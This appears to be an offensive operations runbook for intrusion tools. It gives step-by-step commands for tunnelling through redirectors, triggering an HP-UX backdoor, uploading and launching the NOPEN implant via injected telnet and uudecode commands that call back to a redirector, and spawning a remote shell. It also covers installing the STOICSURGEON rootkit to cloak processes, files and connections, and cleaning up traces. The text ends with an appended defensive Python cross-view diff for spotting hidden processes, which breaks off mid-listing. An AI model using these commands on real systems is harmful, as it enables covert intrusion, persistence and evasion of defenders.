background redirect -tcp -implantlisten CONTROL_PORT -target LINUX_OP_BOX_IP CONTROL_PORT -nodes 40
### to udp 177
#background redirect -udp -lplisten 177 -target 61.555.227.115 177 -maxpacketsize 32000
#background redirect -udp -lplisten 177 -target TARGET-IP 177 -maxpacketsize 32000
background redirect -udp -lplisten 177 -target TARGET_IP 177 -maxpacketsize 32000
### callback for netcat upload
#background redirect -tcp -implantlisten 33881 -target 192.168.254.131 33881 -nodes 40
#background redirect -tcp -implantlisten NETCAT-PORT -target LINUX-OPS-BOX NETCAT-PORT -nodes 40
background redirect -tcp -implantlisten NETCAT_PORT -target LINUX_OP_BOX_IP NETCAT_PORT -nodes 40
### callforward to nopen
#background redirect -tcp -lplisten 32754 -target 61.555.227.115 32754
#background redirect -tcp -lplisten NOPEN-PORT -target UNIX-TARGET-IP NOPEN-PORT
background redirect -tcp -lplisten NOPEN_PORT -target TARGET_IP NOPEN_PORT -bind WINDOWS_OP_BOX_IP
### 3) on windows redir, upload dairyfarm.exe as something obscure (help16.exe) and start:
#background run -command "help16.exe 40211 127.0.0.1:35535"
#background run -command "help16.exe XSERVER-PORT 127.0.0.1:CONTROL-PORT"
background run -command "help16.exe XSERVER_PORT 127.0.0.1:CONTROL_PORT"
### 4) on linux, set up to launch YS, using the appropriate wrap script:
cd /current/up
file noserver
# cp appropriate noserver from morerats to /current/up
# Need to noprep it? Different listener port (default is 32754)
#noprep noserver -lNOPEN_PORT
noprep noserver -lNOPEN_PORT
#packrat -n /current/bin/nc.YS sendmail noserver.new 33881
#packrat -n /current/bin/nc.YS RAT_NAME noserver.new NETCAT-PORT
packrat -n /current/bin/nc.YS RAT_NAME noserver.new NETCAT_PORT
#./wrap-aix.sh -l 61.555.227.110 -r sendmail -p 33881 -x 40211 -d /tmp/.scsi
#./wrap-hpux.sh -l 61.555.227.110 -r sendmail -p 33881 -x 40211 -d /tmp/.scsi
#./wrap-sun.sh -l WIN-TARGET-IP -r RAT_NAME -p NETCAT-PORT -x XSERVER-PORT -d TMP_DIR
./wrap-sun.sh -l WINDOWS_REDIR_IP -r RAT_NAME -p NETCAT_PORT -x XSERVER_PORT -d TMP_DIR
#./xc -x 61.555.227.110 -y 40211 -s 61.555.227.110 192.168.254.72
#./xc -x WIN-TARGET-IP -y XSERVER-PORT -s WIN-TARGET-IP WINDOWS-OP-BOX
./xc -x WINDOWS_REDIR_IP -y XSERVER_PORT -s WINDOWS_REDIR_IP WINDOWS_OP_BOX_IP
### 5) connect to nopen AFTER you control-c the netcat window:
#noclient 192.168.254.72:32754
noclient WINDOWS_OP_BOX_IP:NOPEN_PORT
### 6) on linux, control-C the df_client window
### 7) on windows, the dairyfarm.exe (renamed as help16.exe or whatever) should
### go away from the process listing; you can now remove it from the target.
###
### END File user.tool.dairyfarm.COMMON
### (see also ../etc/user.tool.dairyfarm.COMMON)
###

### BEGIN File user.tool.trigger_hpux_jl_in.COMMON (see also ../etc/user.tool.trigger_hpux_jl_in.COMMON)
###
###############################################################
# TRIGGERING HPUX INCISION via JACKLADDER and JACKLADDERHELPER
###############################################################
### BACKGROUND:
### HP-INCISION provides process and file hiding. It does NOT provide
### connection hiding, nor does it have a triggering capability in this
### version (1.1.2.1 for HPUX11.00).
### HP-JACKLADDER differs from other JACKLADDERs because it requires the use
### of special source ports for triggering. The purpose of the special source
### ports is two-fold: it plays a part in the authentication process for the
### trigger, and it causes the 'accept' call to wait an extra 5 seconds for
### input, thus allowing it to work via most redirection (as long as the
### roundtrip time between the redirector and the target is less than 5
### seconds).
### JACKLADDERHELPER is an "instant-grat" version listening on an extra port.
### It only listens until the target reboots.
### On HPUX, it is typically installed on port 7162 running as 'memlogd'.
### JACKLADDER will take over once the target reboots. Depending on how it
### was installed, it will listen on ports started by inetd (check
### /etc/inetd.conf) or on the sendmail port.
### The HP-JACKLADDER and HP-JACKLADDERHELPER special source ports are:
### 3, 51, 8213, 12634, 16798, 23247

HP-TARGET-IP       self-explanatory
HP-JL-SOURCE-PORT  3, 51, 8213, 12634, 16798, or 23247
JL-LISTEN-PORT     before target reboots - double-check, but probably 7162;
                   after target reboots - double-check, but probably try (13, 21, 23, 37, 113)
NETCAT-PORT        random, for uploading nopen
LINUX-OP-BOX       local Linux machine (probably 192.168.254.71)
WIN-OP-BOX         local Windows machine (probably 192.168.254.72)
UNIX-REDIR-IP      IP that target will call back to
WIN-REDIR-IP       IP that target will call back to
NOPEN_DIR          directory to upload nopen to (/tmp/.scsi usually) (WILL NEED TO ESCAPE SLASHES)
NOPEN_NAME         name of nopen on target
NOPEN_PORT         port to run nopen on
mx
:%s/HP_TARGET_IP/HP_TARGET_IP/g
:%s/HP_JL_SOURCE_PORT/HP_JL_SOURCE_PORT/g
:%s/JL_LISTEN_PORT/JL_LISTEN_PORT/g
:%s/NETCAT_PORT/NETCAT_PORT/g
:%s/LINUX_OP_BOX/LINUX_OP_BOX/g
:%s/WIN_OP_BOX/WIN_OP_BOX/g
:%s/UNIX_REDIR_IP/UNIX_REDIR_IP/g
:%s/WIN_REDIR_IP/WIN_REDIR_IP/g
:%s/NOPEN_DIR/NOPEN_DIR/g
:%s/NOPEN_NAME/NOPEN_NAME/g
:%s/NOPEN_PORT/NOPEN_PORT/g
'x
#########################################################
### TO CONNECT TO JACKLADDER* thru solaris box:
#########################################################
### Verify the JACKLADDERHELPER port is still listening
### If the port doesn't respond, the target may have rebooted or JACKLADDER_HELPER died
### "Connection refused" means that the port isn't listening
### Otherwise scan for ports that should be started by inetd
### jackladderhelper port is probably 7162
-scan JL_LISTEN_PORT TARGET_IP
### On Solaris redirector:
-jackpop HP_TARGET_IP JL_LISTEN_PORT UNIX_REDIR_IP HP_JL_SOURCE_PORT
Your Choice[1] 1
UTC offset? [0]
Which port will we be uploading nopen on? [44841] NETCAT_PORT
Which port would you like nopen to listen on? [48970] NOPEN_PORT
Nopen to upload[] CORRECT_NOSERVER_FROM_MORERATS
Which directory would you like to create[/tmp/.dskman] NOPEN_DIR
What would you like nopen called on target [podd] NOPEN_NAME
Do you want incision to bless the nopen server? [Yn] Y
Continue? [Yn] Y
### after the upload completes:
###   close both jackpop windows,
###   type DONE in -jackpop window
###   connect using the -nstun command given by the -jackpop window
############ GO TO WEARCUP SECTION NOW IF SUCCESSFUL #########
######## TROUBLESHOOTING ONLY - avoid syntax errors with commands being executed on target!:
### Test JL from redirector:
### special source ports: 3, 51, 8213, 12634, 16798, 23247
### Probably need to redirect output (2>&0 1>&0 as below) for every
### command run
-jackpop HP_TARGET_IP JL_LISTEN_PORT UNIX_REDIR_IP HP_JL_SOURCE_PORT
3
0
Y
date 2>&0 1>&0
DONE
##############################################################
### TO CONNECT TO HP-UX JACKLADDER* thru non-Solaris Unix box:
##############################################################
### Window 1 on Unix redirector:
-tunnel
l JL_LISTEN_PORT HP_TARGET_IP JL_LISTEN_PORT HP_JL_SOURCE_PORT
r NETCAT_PORT
### Window 2 on Unix redirector:
# If nopen calling back:
-nrtun NOPEN_PORT
# If calling into nopen, don't run this until you run window 4 cmd
# and nopen appears to be successfully uploaded
-nstun HP_TARGET_IP:NOPEN_PORT
### Window 3 local
packrat NOPEN_NAME CORRECT_NOSERVER_IN_MORERATS NETCAT_PORT
### Window 4 local and scripted
# If calling forward into nopen:
LD_PRELOAD=/current/bin/connect.so CMD="mkdir NOPEN_DIR; cd NOPEN_DIR; telnet UNIX_REDIR_IP NETCAT_PORT NOPEN_NAME.uu; uudecode NOPEN_NAME.uu ; uncompress -f NOPEN_NAME.Z; chmod 700 NOPEN_NAME; export PATH=.; export D=-lNOPEN_PORT; NOPEN_NAME" RA=UNIX_REDIR_IP RP=HP_JL_SOURCE_PORT HIDEME= nc 127.0.0.1 JL_LISTEN_PORT
# If nopen is calling back:
LD_PRELOAD=/current/bin/connect.so CMD="mkdir NOPEN_DIR; cd NOPEN_DIR; telnet UNIX_REDIR_IP NETCAT_PORT NOPEN_NAME.uu; uudecode NOPEN_NAME.uu ; uncompress -f NOPEN_NAME.Z; chmod 700 NOPEN_NAME; export PATH=.; export D=-cUNIX_REDIR_IP:NOPEN_PORT; export S=30; NOPEN_NAME" RA=UNIX_REDIR_IP RP=HP_JL_SOURCE_PORT HIDEME= nc 127.0.0.1 JL_LISTEN_PORT
### TROUBLESHOOTING: CMD can be changed to be any string of shell commands.
### If output from any command in the string desired, you may have to append
### the string "2>&0 1>&0" to each command
### i.e. "ls -la /tmp 2>&0 1>&0; uname -a 2>&0 1>&0"
###
### NOTE: you cannot remove or overwrite a running binary on HP-UX, so if
### you are trying to overwrite something during troubleshooting, this may
### be why
#########################################################
### TO CONNECT TO JACKLADDER* thru windows box:
#########################################################
### from windows target, scan JACKLADDERHELPER to see if it's still listening:
banner -ip HP_TARGET_IP -port JL_LISTEN_PORT
### windows tunnels:
### ----------------
# Examples to connect, connect back to packrat window to upload nopen, and -nstun to target:
### connect to JACKLADDER*
### background redirect -tcp -lplisten JL-LISTEN-PORT -target HP-TARGET-IP JL-LISTEN-PORT HP-JL-SOURCE-PORT -bind WIN-OP-BOX
### background redirect -tcp -lplisten 7162 -target 10.27.50.41 7162 12634 -bind 192.168.254.72
background redirect -tcp -lplisten JL_LISTEN_PORT -target HP_TARGET_IP JL_LISTEN_PORT HP_JL_SOURCE_PORT -bind WIN_OP_BOX
### callback to PACKRAT window
### background redirect -tcp -implantlisten NETCAT-PORT -target LINUX-OP-BOX NETCAT-PORT
### background redirect -tcp -implantlisten 39778 -target 192.168.254.71 39778
background redirect -tcp -implantlisten NETCAT_PORT -target LINUX_OP_BOX NETCAT_PORT
### call forward to NOPEN PORT (default listen port = 32754)
### background redirect -tcp -lplisten 32754 -target HP-TARGET-IP 32754 -bind WIN-OP-BOX
### background redirect -tcp -lplisten 32754 -target 10.27.50.41 32754 -bind 192.168.254.72
background redirect -tcp -lplisten NOPEN_PORT -target HP_TARGET_IP NOPEN_PORT -bind WIN_OP_BOX
### additional nopen windows (increment the lplisten port only):
### background redirect -tcp -lplisten 32755 -target HP-TARGET-IP 32754 -bind WIN-OP-BOX
### background redirect -tcp -lplisten 32755 -target 10.27.50.41 32754 -bind 192.168.254.72
background redirect -tcp -lplisten ANOTHER_PORT -target HP_TARGET_IP NOPEN_PORT -bind WIN_OP_BOX
background redirect -tcp -lplisten ANOTHER_ANOTHER_PORT -target HP_TARGET_IP NOPEN_PORT -bind WIN_OP_BOX
### local linux:
### -----------
# RA = redirector address
# RP = redirector source port
# In local window
packrat NOPEN_NAME CORRECT_NOSERVER_IN_MORERATS NETCAT_PORT
### in a local scripted window:
LD_PRELOAD=/current/bin/connect.so CMD="mkdir NOPEN_DIR; cd NOPEN_DIR; telnet WIN_REDIR_IP NETCAT_PORT NOPEN_NAME.uu; uudecode NOPEN_NAME.uu ; uncompress -f NOPEN_NAME.Z; chmod 700 NOPEN_NAME; export PATH=.; export D=-lNOPEN_PORT; nscd" RA=WIN_REDIR_IP RP=HP_JL_SOURCE_PORT HIDEME= nc WIN_OP_BOX JL_LISTEN_PORT
### once the target uploads nopen, the LD_PRELOAD window should give you a prompt back;
### you can then connect to nopen:
noclient WIN_OP_BOX:NOPEN_PORT
noclient WIN_OP_BOX:ANOTHER_PORT
noclient WIN_OP_BOX:ANOTHER_ANOTHER_PORT
######## TROUBLESHOOTING ONLY - avoid syntax errors with commands being executed on target!:
### to run a command on target (do not string together multiple commands):
### LD_PRELOAD=./connect.so.RHEL4 CMD="uname -a" RA=WIN-REDIR-IP RP=HP-JL-SOURCE-PORT telnet WIN-OP-BOX JL-LISTEN-PORT
### LD_PRELOAD=./connect.so.RHEL4 CMD="uname -a" RA=10.27.50.50 RP=HP-JL-SOURCE-PORT telnet 192.168.254.72 7162
LD_PRELOAD=/current/bin/connect.so CMD="uname -a" RA=WIN_REDIR_IP RP=HP_JL_SOURCE_PORT nc WIN_OP_BOX JL_LISTEN_PORT
### to create a file on target:
### LD_PRELOAD=./connect.so.RHEL4 CMD="touch /tmp/.scsi/x " RA=WIN-REDIR-IP RP=HP-JL-SOURCE-PORT telnet WIN-OP-BOX JL-LISTEN-PORT
### LD_PRELOAD=./connect.so.RHEL4 CMD="touch /tmp/.scsi/x" RA=10.27.50.50 RP=HP-JL-SOURCE-PORT telnet 192.168.254.72 7162
LD_PRELOAD=/current/bin/connect.so CMD="touch /tmp/.scsi/x" RA=WIN_REDIR_IP RP=HP_JL_SOURCE_PORT nc WIN_OP_BOX JL_LISTEN_PORT
### to get an interactive window:
### LD_PRELOAD=./connect.so.RHEL4 CMD="/bin/sh 2>&0 1>&0" RA=WIN-REDIR-IP RP=HP-JL-SOURCE-PORT nc WIN-OP-BOX JL-LISTEN-PORT
### LD_PRELOAD=./connect.so.RHEL4 CMD="/bin/sh 2>&0 1>&0" RA=10.27.50.50 RP=HP-JL-SOURCE-PORT nc 192.168.254.72 7162
LD_PRELOAD=./connect.so.RHEL4 CMD="/bin/sh 2>&0 1>&0" RA=WIN_REDIR_IP RP=HP_JL_SOURCE_PORT nc WIN_OP_BOX JL_LISTEN_PORT
#########################################################
# Running WEARCUP and NOT using -burn
#########################################################
### Once connected, you will be in your temporary directory and will need
### to clean it up. However, HPUX systems will not allow you to delete an
### executable if it's running, nor the directory it's running in. To
### circumvent this, use 'cup' (CleanUp)
-lt
-rm nscd.uu
-gs wearcup -h
# change the options for what you want to call cup and how long you want cup
# to sleep before it kills nopen and cleans your working directory,
# then run it
-gs wearcup -r snmpd -w 4h
# when it is time to end the op, kill the "sleep" pid to start immediate cleanup
# to extend the op, kill the pid of the script (now called snmpd) then kill the sleep
# DO NOT -burnBURN !!!!!!
# use -exit for your windows!!!!!
#########################################################
### HP-INCISION technique checks
#########################################################
### Check if JACKLADDERHELPER is still running:
ps -ef |grep memlogd
### Verify the hidden directory is visible from your hidden process:
-lt /lost+found/3d9892354a360245add0f483f269f384
### Verify the hidden directory is no longer visible when you're in /dev:
cd /dev; ls -la /lost+found/3d9892354a360245add0f483f269f384
### system kernel checks:
### get system configuration value for CPU_VERSION; should return 532
/usr/bin/getconf SC_CPU_VERSION
### get system configuration value for KERNEL_BITS; should return 64
/usr/bin/getconf SC_KERNEL_BITS
### get the status of any kernel modules that are currently loaded
### if under INCISION, should see krm and krm64
kmadmin -s
### check reboot history
last -15 reboot
### check and pull logs
-lt /var/adm/syslog/syslog*
-get /var/adm/syslog/syslog*
-lt /etc/rc.log*
-get /etc/rc.log*
-lt /var/adm/crash
-lt /*history
-lt /root/*history
-vget /*history /root/*history
#########################################################
###
### END File user.tool.trigger_hpux_jl_in.COMMON
### (see also ../etc/user.tool.trigger_hpux_jl_in.COMMON)
###
### BEGIN File user.tool.stoicsurgeon.COMMON (see also ../etc/user.tool.stoicsurgeon.COMMON)
###
##### Stoicsurgeon Ctrl Usage, Installation and Troubleshooting Script #####
### WARNING! READ THIS! WARNING! READ THIS! WARNING! READ THIS! WARNING! ###
#
# NEVER explicitly reference any cloaked file or directory from an unprivileged
# process. Wildcards are ok, but explicit references are not. Stoic will
# self-destruct if an explicit reference to a cloaked file ever occurs from an
# unprivileged process. This includes the cloaked directory, any files inside
# the cloaked directory, any files/directories hidden after installation using
# Ctrl, the /proc entry of cloaked processes, etc.
#
# Examples:
# Assume /lib/.0123456789abcdef is a cloaked file or directory
#   -lt /lib/.0123456789abcdef   ##### BAD BAD BAD BAD BAD #####
#   -lt /lib/.012*               ##### GOOD, WILL NOT SEE OUTPUT FOR CLOAKED DIR,
#                                ##### WILL NOT SELF-DESTRUCT
#
# Assume 12345 is a cloaked process
#   -lt /proc/12345/exe          ##### BAD BAD BAD BAD BAD #####
#   -lt /proc/*/exe              ##### GOOD, WILL NOT SEE OUTPUT FOR 12345
#                                ##### WILL NOT SELF-DESTRUCT
#
# The cloaked directory will be in one of the following directories:
# (the first one of these directories that exists and is on the same disk
# partition as the root of the filesystem "/", see output from "df" or
# "mount" commands)
#   -lt /var/tmp
#   -lt /lib
#   -lt /dev
#   -lt /etc
#   -lt /
#
# Refer to what the `pwd` from triggering Dewdrop returned if possible
#
### END WARNING END WARNING END WARNING END WARNING END WARNING END WARNING ###
########## Global Search/Replace commands ##########
## Target IP: IP address of newly deployed STOIC
## Target hostname: output from running "uname -n" on target
## Callback port: port for DD to call back to connect to ish (usually random)
## Redirector IP: IP for DD to call back to connect to ish
### Target hostname MUST be output from "uname -n" on TARGET!!!!!!!!!!
### uname -n
mx
:%s/TARGET_IP/TARGET_IP/g
:%s/TARGET_HOSTNAME/TARGET_HOSTNAME/g
:%s/CALLBACK_PORT/CALLBACK_PORT/g
:%s/REDIRECTOR_IP/REDIRECTOR_IP/g
`x
############################################################################
##### INSTALLATION #####
############################################################################
## First, make sure no other implants are installed, i.e. the family
# If Solaris
-strings /platform
## For Solaris, confirm can install against this kernel level
# Version number format: MAJORVERSION_MINORVERSION
# Valid patchlevels under "Kernel version": major version < 118833
#                                           if = 118833, minor version <= 24
# Solaris 7 Sparc:  major version <  106541
#                   major version == 106541, minor version <= 44
# Solaris 8 Sparc:  major version <  117350
#                   major version == 117350, minor version <= 47
# Solaris 8 x86:    major version <  108529
#                   major version == 108529, minor version <= 27
# Solaris 9 Sparc:  major version <  122300
#                   major version == 122300, minor version <= 11
# Solaris 9 x86:    major version <  118559
#                   major version == 118559, minor version <= 39
# Solaris 10 Sparc: major version <  125100
#                   major version == 125100, minor version <= 07
#
showrev -a
# If higher than these, DO NOT INSTALL and report this
-problem untested solaris patch level MAJORVERSION_MINORVERSION
## If installing on Linux, compare /proc/version with version being deployed
## Also compare hashes of installed kernels for another sanity check
-cat /proc/version
md5sum /boot/vmlinuz*
## upload STOICSURGEON Installation Package
-put /current/up/date date
## run STOICSURGEON Installation Package
PATH=. date
## Take note of the Date that is displayed, "00" in the seconds field means SUCCESS
## If the Seconds field does not show "00" take note of the entire date provided and
## save data via notes or "-problem". A listing of possible values is located at the
## end of this script in the APPENDIX section.
-problem stoicsurgeon failed install, the date string was OUTPUT_FROM_DATE
## :30 error? On solaris 10, you get this if the kmdb module is loaded.
## Temporary workaround (as of 30 OCT 2007) is to remove it.
modinfo | grep kmdb
## Remove kmdb (NOT kmdbmod), the NUM here is the first column
## modunload -i NUM
modinfo | grep kmdb
## Then try again
-put /current/up/date date
PATH=. date
###################################################
### Trigger Dewdrop and verify SS is working ######
###################################################
### Below are commands to trigger DD without upload/execute, there
### will be no Nopen session, will have a prompt in the "ish" shell
### Possibility exists will have to play with options to ourtn/-irtun
### to trigger on certain ports, etc.
### Try THIS first (if redirecting from Nopen)
-irtun TARGET_IP CALLBACK_PORT -Y5
### or (if going direct)
ourtn -Y5 -p CALLBACK_PORT TARGET_IP
### for Dewdrop-3.X
tipoff-3.X --trigger-address TARGET_IP --target-address TARGET_IP --target-protocol --target-port TARGET_PORT --callback-address CALLBACK_IP --callback-port CALLBACK_PORT --start-ish
### look for output from "pwd" run after target calls back, the resulting
### directory is the SS hidden directory
## In Dewdrop window get the pid of DD connection to ish shell
echo $$
## set DD PID in the rest of the script
mx
:%s/DEWDROP_PID/DEWDROP_PID/g
`x
## In un-elevated Nopen window, verify Dewdrop connection and processes are cloaked
ps -ef | grep DEWDROP_PID
netstat -an | grep CALLBACK_PORT
## the hidden directory will be somewhere on the root filesystem,
## you can now do a directory listing of the hidden directory's parent
## in the un-elevated Nopen window to determine that it is indeed hidden
## (i.e. do "-ls /var/tmp" if hidden dir is "/var/tmp/.0123456789abcdef")
##
## REMINDER: DO NOT EXPLICITLY NAME HIDDEN FILES/DIRS FROM AN UNPRIVILEGED
## WINDOW (see top of script for more detailed explanation)
-ls /var/tmp
-ls /lib
-ls /dev
-ls /etc
-ls /
## Report any cloaking failures via notes or "-problem"
#######################################################################
##### IF NO PROBLEMS ENCOUNTERED, INSTALLATION COMPLETE #####
#######################################################################
#######################################################################
##### Ctrl Usage and Troubleshooting Instructions #####
#######################################################################
### Should have at least two Nopen windows: one to become privileged,
### other to stay unprivileged, for comparing outputs of commands
## get the PID of the Nopen window that will become privileged
-pid
## set Nopen PID in the rest of the script
mx
:%s/PRIVILEGED_NOPEN_PID/PRIVILEGED_NOPEN_PID/g
`x
########################################################
## Ctrl Usage Options:
#  -C [pid | /file/path]  Cloak the given process or file path
#  -c [pid | /file/path]  Uncloak the given process or file path
#  -d                     Display default cloaked directory
#  -E pid                 Enable the given process's ability to see otherwise
#                         cloaked processes and files.
#  -e pid                 Disable the given process's ability to see
#                         otherwise cloaked processes and files.
#  -F pid                 Enable the given process's ability to see otherwise
#                         cloaked files ONLY.
#  -f pid                 Disable the given process's ability to see
#                         otherwise cloaked files ONLY.
#  -P pid                 Enable the given process's ability to see otherwise cloaked
#                         processes ONLY.
#  -p pid                 Disable the given process's ability to see otherwise cloaked
#                         processes ONLY.
#  -K pid                 Designate a process as to be killed upon shutdown
#  -k pid                 Designate a process as to NOT be killed upon shutdown
#  -r /bin/sh             Execute the given program as the root user
#  -T signal              Send the specified signal to all killable cloaked processes.
#  -U                     Invoke a full uninstall (self destruct)
#  -u                     Invoke a partial uninstall (unpatch and unload)
#  -s path                Set the times associated with a given file path
#  -g path                Get the times associated with a given file path
########################################################
## upload SS Control Utility using nopen
-put /current/up/Ctrl c
## or ftshell
~~p /current/up/Ctrl c
### If Nopen already a privileged process (i.e. started by a child of DD,
### etc.), do not need to set SEED variable to use Ctrl, otherwise SEED
### must be set
## SEED calculation algorithm. WARNING do this off target!!!
seedcalc TARGET_HOSTNAME
## if you don't have 'seedcalc'
echo -n TARGET_HOSTNAME | rev | tr -d '\n' | md5sum | cut -f1 -d' '
## if you don't have 'rev'
echo -n TARGET_HOSTNAME | sed '/\n/!G;s/\(.\)\(.*\n\)/&\2\1/;//D;s/.//' | tr -d '\n' | md5sum | cut -f1 -d' '
## set value of SEED in the rest of the script
mx
:%s/CALCULATED_SEED/CALCULATED_SEED/g
`x
## REMINDER: DO NOT USE THIS OUTPUT EXPLICITLY IN AN UNPRIVILEGED PROCESS WHEN
## ACCESSING FILESYSTEM, SEE WARNING AT THE TOP OF THE SCRIPT
## WARNING: WHEN CLOAKING PROCESSES, MUST MAKE SURE THAT NO CLOAKED PROCESS
## IS THE PARENT OF AN UNCLOAKED PROCESS. IF NECESSARY TO HAVE A
## PROCESS UNCLOAKED, MUST UNCLOAK PARENTS ALL THE WAY TO INIT (i.e. if
## need an uncloaked Nopen, Nopen listener must be uncloaked as well)
## Use Ctrl to determine the name of the Cloaked directory
SEED=CALCULATED_SEED PATH=. c -d
## Use Ctrl to enable Nopen to see cloaked processes, connections and files.
SEED=CALCULATED_SEED PATH=. c -E PRIVILEGED_NOPEN_PID
## Use Ctrl to cloak the Nopen process, connections.
SEED=CALCULATED_SEED PATH=. c -C PRIVILEGED_NOPEN_PID
## Optional - Designate Nopen to NOT be killed should the implant be
## shutdown (self-destruct). You won't get any notification that this happened.
SEED=CALCULATED_SEED PATH=. c -k PRIVILEGED_NOPEN_PID
## Or, can do the above three actions in one command line
SEED=CALCULATED_SEED PATH=. c -C PRIVILEGED_NOPEN_PID -E PRIVILEGED_NOPEN_PID -k PRIVILEGED_NOPEN_PID
## can replace PRIVILEGED_NOPEN_PID with the PID of any process you'd like to hide
## Find your nopen connections -- consider narrowing the search as you probably also
## already know your connection ip and port
netstat -an | grep REDIRECTOR_IP
## set Nopen Port in the rest of the script
mx
:%s/NOPEN_PORT/NOPEN_PORT/g
`x
## Find nopen using the privileged process. Verifies you can find Nopen in
## ps and netstat listings when privileged
ps -ef | grep PRIVILEGED_NOPEN_PID
netstat -an |grep NOPEN_PORT
## in an unprivileged window, these should be unsuccessful if Nopen was cloaked
## in an earlier Ctrl command
ps -ef | grep PRIVILEGED_NOPEN_PID
netstat -an | grep NOPEN_PORT
## You should now be able to see the cloaked directory
## The cloaked directory MAY be in one of the following. Refer to what
## the `pwd` from Dewdrop returned
-lt /var/tmp
-lt /lib
-lt /dev
-lt /etc
-lt /
### APPENDIX
## DATE Errors
##
##  1 LOADER_ERROR_UNKNOWN
##    The requested action failed for an unknown reason.
##  2 LOADER_ERROR_MEMORY
##    There was a problem allocating memory.
##  3 LOADER_ERROR_READ_FILE
##    There was a problem reading file data.
##  4 LOADER_ERROR_EXTRACT_PAYLOAD
##    Could not extract payload data.
##  5 LOADER_ERROR_INVALID_PAYLOAD
##    Payload data is invalid.
##  6 LOADER_ERROR_MERGE_ARCHIVE
##    Could not merge old archive with new during an upgrade.
##  7 LOADER_ERROR_GENERATE_PAYLOAD
##    Could not generate new payload data during an upgrade.
##  8 LOADER_ERROR_BUFFER_TOO_SMALL
##    The given buffer is too small to hold the requested data.
##  9 LOADER_ERROR_LIST_BUFFER_TOO_SMALL
##    The given array is too small to hold all the requested data elements.
## 10 LOADER_ERROR_SYSINFO
##    Could not determine the host system information.
## 11 LOADER_ERROR_ENUMERATE_PLATFORM_TAGS
##    Could not enumerate platform types.
## 12 LOADER_ERROR_ENUMERATE_OBJECTS
##    Could not enumerate objects associated with a tag.
## 13 LOADER_ERROR_READ_OBJECT
##    Could not read object data or meta-data.
## 14 LOADER_ERROR_WRITE_OBJECT
##    Could not write object data or meta-data.
## 15 LOADER_ERROR_LOAD_USER_MODULE_OBJECT
##    Could not load a user module data object.
## 16 LOADER_ERROR_EXECUTE_OBJECT
##    Could not execute an executable data object.
## 17 LOADER_ERROR_KERNEL_SHUTDOWN
##    Could not unload existing kernel modules.
## 18 LOADER_ERROR_KERNEL_PLATFORM
##    Payload does not contain any kernel modules for this platform.
## 19 LOADER_ERROR_KERNEL_INJECT
##    Could not inject modules into the running kernel.
## 20 LOADER_ERROR_KERNEL_INVOKE
##    Could not invoke a required kernel service.
## 21 LOADER_ERROR_PERSIST_ENABLE
##    Could not enable persistence.
## 22 LOADER_ERROR_PERSIST_READ
##    Could not read persistent executable.
## 23 LOADER_ERROR_HOSTID
##    Hostid of system did not match the one stored in the archive.
## 24 LOADER_ERROR_EXECL
##    Error calling execl(3) when invoking the 64-bit version of the Loader.
## 25 LOADER_ERROR_FORK
##    Error calling fork(2) when invoking the 64-bit version of the Loader.
## 26 LOADER_ERROR_WAITPID
##    Error calling waitpid(2) when invoking the 64-bit version of the Loader.
## 27 LOADER_ERROR_SIGACTION
##    Error calling sigaction(2) when setting the Loader process signal handlers.
## 28 LOADER_ERROR_SIGADDSET
##    Error calling sigaddset(2) when setting the Loader process signal handlers.
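The Ctrl section above verifies cloaking by running `ps -ef` and `netstat -an` from a privileged window and again from an unprivileged one and comparing the two (the same idea as NOPEN's `=psdiff`, whose HIDDEN entries are mentioned in the HP-INCISION material). The defender's version of that comparison is below: an added example, not code from the original script or from any of the tools it describes. It takes two captures of each listing (a trusted view, for instance from a live-response tool or a second enumeration method, and the ordinary one) and reports what only the trusted view shows; it also applies a single-listing check that needs no trusted view at all, based on the script's own warning that a cloaked parent of an uncloaked child is inconsistent. All listings below are constructed sample output, and the code assumes both views of a pair were captured at the same moment.

```python
"""Cross-view diff of process and listener listings: the defender's version of
the privileged-vs-unprivileged comparison in the Ctrl section.  Added example,
not part of the original script; every listing here is constructed."""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Proc:
    pid: int
    ppid: int
    cmd: str


def parse_ps_ef(text: str) -> dict[int, Proc]:
    """Parse `ps -ef` output (UID PID PPID C STIME TTY TIME CMD) into {pid: Proc}."""
    procs: dict[int, Proc] = {}
    for line in text.splitlines():
        parts = line.split(None, 7)          # CMD keeps its embedded spaces
        if len(parts) < 8 or not parts[1].isdigit() or not parts[2].isdigit():
            continue                         # header or malformed line
        procs[int(parts[1])] = Proc(int(parts[1]), int(parts[2]), parts[7])
    return procs


# Local-address token: Linux "0.0.0.0:22", Solaris/HP-UX "*.7162" or "10.0.0.5.22"
_LOCAL_ADDR = re.compile(r"(?:\*|[\d.]+)[.:](\d+)")


def parse_listen_ports(text: str) -> set[int]:
    """Local ports in LISTEN state from `netstat -an` output."""
    ports: set[int] = set()
    for line in text.splitlines():
        if "LISTEN" not in line:
            continue
        for tok in line.split():
            m = _LOCAL_ADDR.fullmatch(tok)
            if m:                            # first address-looking token is the local side
                ports.add(int(m.group(1)))
                break
    return ports


def hidden_entries(trusted_ps: str, untrusted_ps: str,
                   trusted_ns: str, untrusted_ns: str):
    """PIDs and listening ports present in the trusted view but absent from the
    untrusted one.  Only meaningful when both views were captured together."""
    t_procs, u_procs = parse_ps_ef(trusted_ps), parse_ps_ef(untrusted_ps)
    hidden_pids = {pid: p for pid, p in t_procs.items() if pid not in u_procs}
    hidden_ports = parse_listen_ports(trusted_ns) - parse_listen_ports(untrusted_ns)
    return hidden_pids, hidden_ports


def dangling_parents(ps_text: str) -> list[Proc]:
    """Single-view check: processes whose PPID is not itself in the listing.
    A process that exits between two reads of the process table can also cause
    this, so treat a hit as a lead to confirm, not as proof."""
    procs = parse_ps_ef(ps_text)
    return [p for p in procs.values() if p.ppid != 0 and p.ppid not in procs]


# Constructed sample listings (not captured from any real host).
PS_PRIVILEGED = """\
UID        PID  PPID  C STIME TTY          TIME CMD
root         1     0  0 Oct30 ?        00:00:02 init [3]
root       412     1  0 Oct30 ?        00:00:00 /usr/sbin/sshd
root      2231     1  0 10:14 ?        00:00:00 sendmail
root      2240  2231  0 10:15 pts/0    00:00:00 -sh
"""
PS_UNPRIVILEGED = """\
UID        PID  PPID  C STIME TTY          TIME CMD
root         1     0  0 Oct30 ?        00:00:02 init [3]
root       412     1  0 Oct30 ?        00:00:00 /usr/sbin/sshd
root      2240  2231  0 10:15 pts/0    00:00:00 -sh
"""
NS_PRIVILEGED = """\
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:32754           0.0.0.0:*               LISTEN
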